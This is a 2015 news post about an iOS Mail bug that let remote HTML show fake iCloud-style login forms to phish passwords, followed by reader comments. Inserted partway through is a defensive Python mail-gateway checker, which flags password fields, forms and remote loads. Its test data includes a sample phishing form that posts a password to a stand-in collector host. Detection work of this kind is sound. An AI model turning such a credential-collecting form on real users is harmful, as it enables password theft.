November 24, 2024
iOS Mail Bug Could Be Used to Phish Passwords From Users


Posted June 10, 2015 at 4:02pm by iClarified
Jan Soucek has discovered a new bug in the iOS Mail app that could load remote HTML code, replacing the original content of the message.

Back in January 2015 I stumbled upon a bug in iOS's mail client, resulting in HTML tag in e-mail messages not being ignored. This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password "collector" using simple HTML and CSS.

The bug could be used to create fake iCloud-like login forms that would capture passwords and more -- right within the iOS Mail app. Soucek says he notified Apple of this bug back in January 2015, but the company never issued a fix -- so he published a proof of concept to put pressure on Apple to fix the bug.


While Soucek uses an iCloud-login form to demonstrate the bug, almost any website could be imitated, making it possible to steal credit cards, passwords, social security numbers, and more.

No word on which iOS versions are impacted by the bug, but please be wary of any pop-up login forms that appear within the iOS Mail app.
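On the defensive side, a mail gateway can flag messages whose HTML part carries a password field or pulls in a remote document before they reach a client. The sketch below is an added example, not code from the article or from Soucek's proof of concept; the list of tags treated as remote loads, the function names and the sample messages are assumptions constructed for illustration.

```python
import email
from email import policy
from html.parser import HTMLParser

# Assumption of this example: these tags are treated as "loads a remote document".
REMOTE_TAGS = {"iframe", "object", "embed"}

class MailHtmlAudit(HTMLParser):
    """Records HTML constructs that can present or fetch a login form in mail."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # tag and attribute names arrive lower-cased
        if tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append(("password-input", a.get("name", "")))
        elif tag == "form":
            self.findings.append(("form", a.get("action", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("remote-load", a.get("content", "")))
        elif tag in REMOTE_TAGS:
            self.findings.append(("remote-load", a.get("src") or a.get("data", "")))

def audit_message(raw: bytes):
    """Return findings for every text/html part of a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            parser = MailHtmlAudit()
            parser.feed(part.get_content())
            parser.close()
            findings.extend(parser.findings)
    return findings

def should_quarantine(findings):
    """Policy of this example: hold mail with a password field or a remote load."""
    return any(kind in ("password-input", "remote-load") for kind, _ in findings)

# Constructed sample messages (not taken from the page or the proof of concept).
HEADERS = (b"From: a@example.invalid\r\nSubject: sample\r\nMIME-Version: 1.0\r\n"
           b"Content-Type: text/html; charset=utf-8\r\n\r\n")
SUSPECT = HEADERS + (b'<form action="https://collector.example.invalid/s" method="post">'
                     b'<input name="user"><input type="PASSWORD" name="pw"></form>')
BENIGN = HEADERS + b"<html><body><p>Lunch at noon?</p></body></html>"

if __name__ == "__main__":
    for label, raw in (("suspect", SUSPECT), ("benign", BENIGN)):
        found = audit_message(raw)
        print(label, should_quarantine(found), found)
```

A bare form is reported but not quarantined on its own, since some legitimate newsletters embed search or survey forms.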

Comments (5)
Marcy Leavitt - June 11, 2015 at 6:38am
I get pop up mail logins frequently asking me to verify my Yahoo login password. Should I worry? Changing my password is probably the best option now. I use iOS 8.3 and iPhone 6 Plus.
gamerscul9870 - June 10, 2015 at 4:34pm
What they also need to fix is how I get multiple of the same messages from iClarified the more a new comment is added to the article. Gmail is the only reason I use this to confirm my comment.
James - June 10, 2015 at 4:32pm
I got this pop up last night on my Mac mini. It had my user name filled in and asked for my password for iCloud login and asked me to put it in 2 times. Not sure if it's the same thing? :/
AppleGuy299 - June 10, 2015 at 6:33pm
No, it's an issue with OS X 10.10 logging out and back in from System Preferences > iCloud.
stevenlacross - June 10, 2015 at 4:10pm
They also need to fix the glitch where if a photo sits in your recently deleted album for more than 30 days, it doesn't get hidden and actually gets deleted instead. Like if you manually set the date back a couple months or more, you'll see photos reappear in the recently deleted album